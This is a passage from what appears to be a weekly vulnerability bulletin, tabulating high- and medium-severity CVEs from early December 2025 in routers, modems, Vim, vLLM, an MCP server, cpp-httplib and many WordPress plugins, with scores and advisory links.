| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61609 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61610 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61617 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61618 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed | 2025-12-01 | 7.5 | CVE-2025-61619 | https://www.unisoc.com/en/support/announcement/1995394837938163714 |
| UTT-- 512W | A vulnerability has been found in UTT è¿›å– 512W up to 1.7.7-171114. Affected by this issue is the function strcpy of the file /goform/formP2PLimitConfig. Such manipulation of the argument except leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 8.8 | CVE-2025-14191 | VDB-334611 | UTT è¿›å– 512W formP2PLimitConfig strcpy buffer overflow VDB-334611 | CTI Indicators (IOB, IOC, IOA) Submit #699220 | UTT艾泰 è¿›å– 512W Router <=v3v1.7.7-171114 Buffer Overflow https://github.com/DavCloudz/cve/blob/main/UTT/512W/UTT%20512W%20Buffer%20Overflow%20Vulnerability.md https://github.com/DavCloudz/cve/blob/main/UTT/512W/UTT%20512W%20Buffer%20Overflow%20Vulnerability.md#poc |
| UTT-- 520W | A flaw has been found in UTT è¿›å– 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formArpBindConfig. Executing manipulation of the argument pools can lead to buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 8.8 | CVE-2025-14141 | VDB-334529 | UTT è¿›å– 520W formArpBindConfig strcpy buffer overflow VDB-334529 | CTI Indicators (IOB, IOC, IOA) Submit #698522 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/13.md https://github.com/cymiao1978/cve/blob/main/new/13.md#poc |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.1.1947, an uncontrolled search path vulnerability on Windows allows Vim to execute malicious executables placed in the current working directory for the current edited file. On Windows, when using cmd.exe as a shell, Vim resolves external commands by searching the current working directory before system paths. When Vim invokes tools such as findstr for :grep, external commands or filters via :!, or compiler/:make commands, it may inadvertently run a malicious executable present in the same directory as the file being edited. The issue affects Vim for Windows prior to version 9.1.1947. | 2025-12-02 | 7.8 | CVE-2025-66476 | https://github.com/vim/vim/security/advisories/GHSA-g77q-xrww-p834 https://github.com/vim/vim/commit/083ec6d9a3b7b09006e0ce69ac802597d25 https://github.com/vim/vim/releases/tag/v9.1.1947 |
| vinoth06--User Generator and Importer | The User Generator and Importer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.2.2. This is due to missing nonce validation in the "Import Using CSV File" function. This makes it possible for unauthenticated attackers to elevate user privileges by creating arbitrary accounts with administrator privileges via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 8.8 | CVE-2025-12879 | https://www.wordfence.com/threat-intel/vulnerabilities/id/82699a17-ea45-4493-98c4-07f62ca0b1f9?source=cve https://plugins.trac.wordpress.org/browser/user-importer-and-generator/tags/1.2.2/user-generator.php#L145 |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend's code on the victim host. This vulnerability is fixed in 0.11.1. | 2025-12-01 | 7.1 | CVE-2025-66448 | https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm https://github.com/vllm-project/vllm/pull/28126 https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86 |
| widgetpack--Rich Shortcodes for Google Reviews | The Rich Shortcodes for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contents of a Google Review in all versions up to, and including, 6.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially patched in version 6.6.2. | 2025-12-06 | 7.2 | CVE-2025-12499 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e2960224-4446-4fc6-8d18-6f9911b4cbad?source=cve https://plugins.trac.wordpress.org/changeset/3411521/widget-google-reviews https://plugins.trac.wordpress.org/changeset/3389203/widget-google-reviews |
| wpchill--Image Gallery Photo Grid & Video Gallery | The Modula Image Gallery plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'ajax_unzip_file' function in versions 2.13.1 to 2.13.2. This makes it possible for authenticated attackers, with Author-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). | 2025-12-03 | 7.2 | CVE-2025-13645 | https://www.wordfence.com/threat-intel/vulnerabilities/id/080683bb-713f-4aa8-b635-90c96f358bec?source=cve https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.13.2/includes/admin/class-modula-gallery-upload.php#L1025 https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.13.2/includes/admin/class-modula-gallery-upload.php#L1119 https://plugins.trac.wordpress.org/changeset/3395701/modula-best-grid-gallery#file5 https://github.com/WPChill/modula-lite/commit/90c8eb982f71b31584d9be9359e3b594e03927d7 https://plugins.trac.wordpress.org/changeset/3407949/modula-best-grid-gallery |
| wpchill--Image Gallery Photo Grid & Video Gallery | The Modula Image Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'ajax_unzip_file' function in versions 2.13.1 to 2.13.2. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files with race condition on the affected site's server which may make remote code execution possible. | 2025-12-03 | 7.5 | CVE-2025-13646 | https://www.wordfence.com/threat-intel/vulnerabilities/id/59ee0ca2-846d-4ae8-ad19-7c3826861aeb?source=cve https://github.com/WPChill/modula-lite/blob/master/includes/admin/class-modula-gallery-upload.php#L1103 https://plugins.trac.wordpress.org/changeset/3395701/modula-best-grid-gallery#file5 https://github.com/WPChill/modula-lite/commit/90c8eb982f71b31584d9be9359e3b594e03927d7 https://plugins.trac.wordpress.org/changeset/3407949/modula-best-grid-gallery |
| wphocus--My auctions allegro | The My auctions allegro plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.6.32 via the 'controller' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2025-12-05 | 8.1 | CVE-2025-12851 | https://www.wordfence.com/threat-intel/vulnerabilities/id/202a8493-6df0-4a5e-b6bf-099219830e01?source=cve https://plugins.trac.wordpress.org/changeset/3402268/my-auctions-allegro-free-edition |
| wphocus--My auctions allegro | The My auctions allegro plugin for WordPress is vulnerable to SQL Injection via the 'auction_id' parameter in all versions up to, and including, 3.6.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-05 | 7.5 | CVE-2025-12850 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc4883b8-5783-49ff-ab3b-c568c9923227?source=cve https://plugins.trac.wordpress.org/changeset/3402268/my-auctions-allegro-free-edition |
| wpkube--Cool Tag Cloud | The Cool Tag Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cool_tag_cloud' shortcode in all versions up to, and including, 2.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 8.1 | CVE-2025-13614 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eac56190-4f81-464d-9737-ae2e3d4b0d0d?source=cve http://plugins.trac.wordpress.org/browser/cool-tag-cloud/trunk/cool-tag-cloud.php?marks=798-799#L682 |
| xwikisas--xwiki-pro-macros | XWiki Remote Macros provides XWiki rendering macros that are useful when migrating content from Confluence. Prior to 1.27.1, the macro executes Velocity from the details pages without checking for permissions, which can lead to remote code execution. This vulnerability is fixed in 1.27.1. | 2025-12-05 | 8.3 | CVE-2025-65036 | https://github.com/xwikisas/xwiki-pro-macros/security/advisories/GHSA-472x-fwh9-r82f |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.27.0, a vulnerability allows attacker-controlled HTTP headers to influence server-visible metadata, logging, and authorization decisions. An attacker can inject headers named REMOTE_ADDR, REMOTE_PORT, LOCAL_ADDR, LOCAL_PORT that are parsed into the request header multimap via read_headers() in httplib.h (headers.emplace), then the server later appends its own internal metadata using the same header names in Server::process_request without erasing duplicates. Because Request::get_header_value returns the first entry for a header key (id == 0) and the client-supplied headers are parsed before server-inserted headers, downstream code that uses these header names may inadvertently use attacker-controlled values. Affected files/locations: cpp-httplib/httplib.h (read_headers, Server::process_request, Request::get_header_value, get_header_value_u64) and cpp-httplib/docker/main.cc (get_client_ip, nginx_access_logger, nginx_error_logger). Attack surface: attacker-controlled HTTP headers in incoming requests flow into the Request.headers multimap and into logging code that reads forwarded headers, enabling IP spoofing, log poisoning, and authorization bypass via header shadowing. This vulnerability is fixed in 0.27.0. | 2025-12-05 | 10 | CVE-2025-66570 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-xm2j-vfr9-mg9m https://github.com/yhirose/cpp-httplib/commit/ac9ebb0ee333ce8bf13523f487bdfad9518a2aff |
| ZDoom--gzdoom | GZDoom is a feature centric port for all Doom engine games. GZDoom is an open source Doom engine. In versions 4.14.2 and earlier, ZScript actor state handling allows scripts to read arbitrary addresses, write constants into the JIT-compiled code section, and redirect control flow through crafted FState and VMFunction structures. A script can copy FState structures into a writable buffer, modify function pointers and state transitions, and cause execution of attacker-controlled bytecode, leading to arbitrary code execution. | 2025-12-03 | 7.8 | CVE-2025-54065 | https://github.com/ZDoom/gzdoom/security/advisories/GHSA-prhc-chfw-32jg |
| ZSPACE--Q2C NAS | A vulnerability was identified in ZSPACE Q2C NAS up to 1.1.0210050. Affected is the function zfilev2_api.CloseSafe of the file /v2/file/safe/close of the component HTTP POST Request Handler. The manipulation of the argument safe_dir leads to command injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 8.8 | CVE-2025-14106 | VDB-334488 | ZSPACE Q2C NAS HTTP POST Request close zfilev2_api.CloseSafe command injection VDB-334488 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697141 | ZSPACE Q2C NAS v1.1.0210050 Command Injection https://www.notion.so/2af6cf4e528a80bab847dcc1fb677590 |
| ZSPACE--Q2C NAS | A security flaw has been discovered in ZSPACE Q2C NAS up to 1.1.0210050. Affected by this vulnerability is the function zfilev2_api.SafeStatus of the file /v2/file/safe/status of the component HTTP POST Request Handler. The manipulation of the argument safe_dir results in command injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 8.8 | CVE-2025-14107 | VDB-334489 | ZSPACE Q2C NAS HTTP POST Request status zfilev2_api.SafeStatus command injection VDB-334489 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697143 | ZSPACE Q2C NAS v1.1.0210050 Command Injection https://www.notion.so/2af6cf4e528a8001935bcdd9e77f1ebc |
| ZSPACE--Q2C NAS | A weakness has been identified in ZSPACE Q2C NAS up to 1.1.0210050. Affected by this issue is the function zfilev2_api.OpenSafe of the file /v2/file/safe/open of the component HTTP POST Request Handler. This manipulation of the argument safe_dir causes command injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 8.8 | CVE-2025-14108 | VDB-334490 | ZSPACE Q2C NAS HTTP POST Request open zfilev2_api.OpenSafe command injection VDB-334490 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697144 | ZSPACE Q2C NAS v1.1.0210050 Command Injection https://www.notion.so/2af6cf4e528a80258f60fa529c48d291 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| adreastrian--WP Social Ninja Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) | The WP Social Ninja - Embed Social Feeds, Customer Reviews, Chat Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping on externally-sourced content. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can post malicious content to a connected Google Business Profile or Facebook page. | 2025-12-02 | 6.1 | CVE-2025-13007 | https://www.wordfence.com/threat-intel/vulnerabilities/id/16c9ed4a-9e9f-4f10-b3fd-7f0db2c86112?source=cve https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Services/Platforms/Reviews/GoogleMyBusiness.php#L308 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Views/public/reviews-templates/elements/review-content.php#L7 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Services/Helper.php#L19 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3397264%40wp-social-reviews%2Ftrunk&old=3392979%40wp-social-reviews%2Ftrunk&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3400414%40wp-social-reviews%2Ftrunk&old=3397264%40wp-social-reviews%2Ftrunk&sfp_email=&sfph_mail= |
| ADSLR--B-QE2W401 | A vulnerability was detected in ADSLR B-QE2W401 250814-r037c. Affected by this issue is the function parameterdel_swifimac of the file /send_order.cgi. Performing manipulation of the argument del_swifimac results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13797 | VDB-333808 | ADSLR B-QE2W401 send_order.cgi parameterdel_swifimac command injection VDB-333808 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691838 | Adslr B-QE2W401 250814-r037c Remote code execution https://www.notion.so/2a60c75766a88027a6aec07b378332a8 |
| ADSLR--NBR1005GPEV2 | A flaw has been found in ADSLR NBR1005GPEV2 250814-r037c. This affects the function ap_macfilter_add of the file /send_order.cgi. Executing manipulation of the argument mac can lead to command injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13798 | VDB-333809 | ADSLR NBR1005GPEV2 send_order.cgi ap_macfilter_add command injection VDB-333809 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691841 | Adslr NBR1005GPEV2 250814-r037c Remote code execution https://www.notion.so/2a60c75766a8805a8973d2ff6a6bcb26 |
| ADSLR--NBR1005GPEV2 | A vulnerability has been found in ADSLR NBR1005GPEV2 250814-r037c. This vulnerability affects the function ap_macfilter_del of the file /send_order.cgi. The manipulation of the argument mac leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13799 | VDB-333810 | ADSLR NBR1005GPEV2 send_order.cgi ap_macfilter_del command injection VDB-333810 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691842 | Adslr NBR1005GPEV2 250814-r037c Remote code execution https://www.notion.so/2a60c75766a8801e8e4bdd3be8072d9d |
| ADSLR--NBR1005GPEV2 | A vulnerability was found in ADSLR NBR1005GPEV2 250814-r037c. This issue affects the function set_mesh_disconnect of the file /send_order.cgi. The manipulation of the argument mac results in command injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13800 | VDB-333811 | ADSLR NBR1005GPEV2 send_order.cgi set_mesh_disconnect command injection VDB-333811 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691942 | Adslr NBR1005GPEV2 250814-r037c Remote code execution https://www.notion.so/2a70c75766a88023aa0ed833ff0239e1 |
| alexkar--ARK Related Posts | The ARK Related Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 2.19. This is due to missing or incorrect nonce validation on the ark_rp_options_page function. This makes it possible for unauthenticated attackers to modify the plugin's configuration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-13684 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7eb53a80-89e5-4d8c-a1ba-c272196a3340?source=cve https://plugins.trac.wordpress.org/browser/ark-relatedpost/trunk/ark-relatedpost.php#L109 https://plugins.trac.wordpress.org/browser/ark-relatedpost/tags/2.19/ark-relatedpost.php#L109 |
| AMTT--Hotel Broadband Operation System | A security flaw has been discovered in AMTT Hotel Broadband Operation System 1.0. This affects an unknown part of the file /manager/card/cardmake_down.php. Performing manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.7 | CVE-2025-14090 | VDB-334480 | AMTT Hotel Broadband Operation System cardmake_down.php sql injection VDB-334480 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696460 | Anmei Century (Beijing) Technology Co., Ltd. Hotel Broadband Operation System v1.0 SQL Injection https://github.com/CHENZHUANGLIN/cve/issues/2 |
| anastis--CSSIgniter Shortcodes | The CSSIgniter Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'element' shortcode attribute in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-03 | 6.4 | CVE-2025-13448 | https://www.wordfence.com/threat-intel/vulnerabilities/id/288419ad-fbb2-4a4a-8a40-89ae024e068d?source=cve https://plugins.trac.wordpress.org/browser/cssigniter-shortcodes/trunk/ci-shortcodes.php#L117 https://plugins.trac.wordpress.org/browser/cssigniter-shortcodes/tags/2.4.1/ci-shortcodes.php#L117 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3408092%40cssigniter-shortcodes&new=3408092%40cssigniter-shortcodes&sfp_email=&sfph_mail= |
| apptainer--apptainer | Apptainer is an open source container platform. In Apptainer versions less than 1.4.5, a container can disable two of the forms of the little used --security option, in particular the forms --security=apparmor:<profile> and --security=selinux:<label> which otherwise put restrictions on operations that containers can do. The --security option has always been mentioned in Apptainer documentation as being a feature for the root user, although these forms do also work for unprivileged users on systems where the corresponding feature is enabled. Apparmor is enabled by default on Debian-based distributions and SElinux is enabled by default on RHEL-based distributions, but on SUSE it depends on the distribution version. This vulnerability is fixed in 1.4.5. | 2025-12-02 | 4.5 | CVE-2025-65105 | https://github.com/apptainer/apptainer/security/advisories/GHSA-j3rw-fx6g-q46j https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm https://github.com/sylabs/singularity/security/advisories/GHSA-wwrx-w7c9-rf87 https://github.com/apptainer/apptainer/pull/3226 https://github.com/apptainer/apptainer/commit/4313b42717e18a4add7dd7503528bc15af905981 https://github.com/apptainer/apptainer/commit/82f17900a0c31bc769bf9b4612d271c7068d8bf2 |
| ArcadeAI--arcade-mcp | Arcade MCP allows you to to create, deploy, and share MCP Servers. Prior to 1.5.4, the arcade-mcp HTTP server uses a hardcoded default worker secret ("dev") that is never validated or overridden during normal server startup. As a result, any unauthenticated attacker who knows this default key can forge valid JWTs and fully bypass the FastAPI authentication layer. This grants remote access to all worker endpoints-including tool enumeration and tool invocation-without credentials. This vulnerability is fixed in 1.5.4. | 2025-12-02 | 6.5 | CVE-2025-66454 | https://github.com/ArcadeAI/arcade-mcp/security/advisories/GHSA-g2jx-37x6-6438 https://github.com/ArcadeAI/arcade-mcp/pull/691 https://github.com/ArcadeAI/arcade-mcp/commit/44660d18ceb220600401303df860a31ca766c817 |
| arnabkumar--Cute News Ticker | The Cute News Ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'color' shortcode attribute in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13656 | https://www.wordfence.com/threat-intel/vulnerabilities/id/92f53507-4475-401b-b57c-f6652a868be9?source=cve https://wordpress.org/plugins/cute-news-ticker/ https://plugins.trac.wordpress.org/browser/cute-news-ticker/trunk/main-function.php#L60 https://plugins.trac.wordpress.org/browser/cute-news-ticker/tags/1.0/main-function.php#L60 |
| ays-pro--Photo Gallery by Ays Responsive Image Gallery | The Photo Gallery by Ays plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.4.8. This is due to missing nonce verification on the bulk action functionality in the 'process_bulk_action()' function. This makes it possible for unauthenticated attackers to perform bulk operations (delete, publish, or unpublish galleries) via a forged request granted they can trick an administrator into performing an action such as clicking on a link. | 2025-12-02 | 4.3 | CVE-2025-13685 | https://www.wordfence.com/threat-intel/vulnerabilities/id/42a14820-710d-4149-9a8d-aa84479f0980?source=cve https://plugins.trac.wordpress.org/browser/gallery-photo-gallery/trunk/includes/lists/class-gallery-photo-gallery-list-table.php#L1060 https://plugins.trac.wordpress.org/browser/gallery-photo-gallery/tags/6.4.7/includes/lists/class-gallery-photo-gallery-list-table.php#L1060 https://plugins.trac.wordpress.org/changeset/3404625/gallery-photo-gallery/tags/6.4.9/includes/lists/class-gallery-photo-gallery-list-table.php?old=3402336&old_path=gallery-photo-gallery%2Ftags%2F6.4.8%2Fincludes%2Flists%2Fclass-gallery-photo-gallery-list-table.php |
| beaverbuilder--Beaver Builder Page Builder Drag and Drop Website Builder | The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.9.4. This is due to insufficient capability checks in the REST API endpoints under the 'fl-controls/v1' namespace that control site-wide Global Presets. This makes it possible for authenticated attackers with contributor-level access and above to add, modify, or delete global color and background presets that affect all Beaver Builder content site-wide. | 2025-12-02 | 4.3 | CVE-2025-11726 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b797e141-a9d2-48c4-a44e-a59a80a90a5b?source=cve https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L53 https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L252 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406987%40beaver-builder-lite-version&new=3406987%40beaver-builder-lite-version&sfp_email=&sfph_mail= |
| beaverbuilder--Beaver Builder Page Builder Drag and Drop Website Builder | The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.9.4. This is due to the plugin not properly verifying a user's authorization in the disable() function. This makes it possible for authenticated attackers, with contributor level access and above, to disable the Beaver Builder layout on arbitrary posts and pages, causing content integrity issues and layout disruption on those pages. | 2025-12-04 | 4.3 | CVE-2025-12782 | https://www.wordfence.com/threat-intel/vulnerabilities/id/710ed734-ca98-4ab3-82d5-359e683ee062?source=cve https://plugins.trac.wordpress.org/changeset/3406987/beaver-builder-lite-version |
| bigmaster--Payaza | The Payaza plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_update_order_status' AJAX endpoint in all versions up to, and including, 0.3.8. This makes it possible for unauthenticated attackers to update order statuses. | 2025-12-05 | 5.3 | CVE-2025-12355 | https://www.wordfence.com/threat-intel/vulnerabilities/id/acc88688-76e0-4477-8b7c-eeff541881ab?source=cve https://wordpress.org/plugins/payaza/ |
| breadbutter--Bread & Butter: Gate content & Improve lead conversion in 60 seconds | The Bread & Butter: Gate content + Capture leads + Collect first-party data + Nurture with Ai agents plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.10.1321. This is due to missing or incorrect nonce validation on the uploadImage() function. This makes it possible for unauthenticated attackers to upload arbitrary files that make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12189 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bb280004-e0ba-44c8-a205-8fec30900d86?source=cve https://plugins.trac.wordpress.org/browser/bread-butter/trunk/src/Base/Ajax.php#L411 https://github.com/d0n601/CVE-2025-12189 https://ryankozak.com/posts/cve-2025-12189/ |
| cgrymala--List Attachments Shortcode | The List Attachments Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before_list' parameter in the [list-attachments] shortcode in all versions up to, and including, 0.4.1a due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-12717 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a67b4ec2-b337-478f-aaaa-2ce19c4deb4c?source=cve https://plugins.trac.wordpress.org/browser/list-attachments-shortcode/tags/0.6a/class-list-attachments-shortcode.php#L47 https://plugins.trac.wordpress.org/browser/list-attachments-shortcode/tags/0.6a/class-list-attachments-shortcode.php#L85 |
| CKSource--CKFinder | In CKSource CKFinder before 2.5.0.1 for ASP.NET, authenticated users could download any file from the server if the correct path to a file was provided. | 2025-12-05 | 5 | CVE-2016-20023 | https://download.cksource.com/CKFinder/CKFinder%20for%20ASP.NET/2.5.0.1/ |
| code-projects--Employee Profile Management System | A vulnerability was determined in code-projects Employee Profile Management System 1.0. This vulnerability affects unknown code of the file /view_personnel.php. Executing manipulation of the argument per_id can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-07 | 6.3 | CVE-2025-14193 | VDB-334613 | code-projects Employee Profile Management System view_personnel.php sql injection VDB-334613 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699245 | code-projects Employee Profile Management System published November 15, 2025 SQL Injection https://github.com/shenxianyuguitian/employee-management-SQL https://code-projects.org/ |
| code-projects--Employee Profile Management System | A security flaw has been discovered in code-projects Employee Profile Management System 1.0. Impacted is an unknown function of the file /profiling/add_file_query.php. The manipulation of the argument per_file results in unrestricted upload. The attack may be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-07 | 6.3 | CVE-2025-14195 | VDB-334615 | code-projects Employee Profile Management System add_file_query.php unrestricted upload VDB-334615 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699247 | code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload https://github.com/shenxianyuguitian/employee-management-UFU https://code-projects.org/ |
| code-projects--Question Paper Generator | A flaw has been found in code-projects Question Paper Generator up to 1.0. This vulnerability affects unknown code of the file /selectquestionuser.php. This manipulation of the argument subid causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2025-12-07 | 6.3 | CVE-2025-14203 | VDB-334646 | code-projects Question Paper Generator selectquestionuser.php sql injection VDB-334646 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700153 | code-projects Question Paper 1.0 SQL Injection https://github.com/asd1238525/cve/blob/main/SQL17.md https://code-projects.org/ |
| codeconfig--CodeConfig Accessibility | The Accessiy By CodeConfig Accessibility plugin for WordPress is vulnerable to unauthorized page creation due to missing authorization checks in versions up to, and including, 1.0.0. This is due to the plugin not performing capability checks in the `Settings::createPage()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary published pages on the site via the `ccpcaCreatePage` AJAX action. | 2025-12-06 | 5.3 | CVE-2025-13358 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe324d4d-eb52-4eeb-ad91-072a6e84d9ba?source=cve https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax/Settings.php#L96 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax/Settings.php#L96 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax.php#L24 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax.php#L24 |
